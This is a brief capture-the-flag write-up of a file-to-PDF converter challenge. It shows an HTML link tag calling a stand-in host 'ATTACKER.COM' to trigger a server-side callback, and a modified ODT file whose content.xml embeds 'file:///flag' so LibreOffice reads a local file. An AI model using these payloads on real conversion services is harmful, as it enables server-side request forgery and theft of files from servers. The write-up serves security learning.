Free converter for everyone. You find the flag at : /flag Link: http://22.214.171.124:1920
We are given a black-box web challenge. This application allows us to upload files in various formats (.doc, .jpg, etc.) and converts them into a PDF for us to download.
The first thing that came to mind was whether I can upload arbitrary HTML, since HTML has plenty of potential SSRF / file inclusion vectors. Sure enough, when I uploaded the following HTML file, I got a callback to my server.
<link rel=stylesheet href='http://ATTACKER.COM/exploit.css'>
User-Agentshowed that LibreOffice was making the callback.
OPTIONS /exploit.css HTTP/1.1
We create a sample LibreOffice word document,
poc.odt. After unzipping the ODT file, we can modify the
content.xmlfile to include our payload. We create a
text:sectiontag that links to the
<?xml version="1.0" encoding="UTF-8"?>
xlink:href="file:///flag" xlink:type="simple" xlink:show="embed"
Then, zipping the files again into a
modified.odtgives us our payload. Uploading this to the server gives us the flag!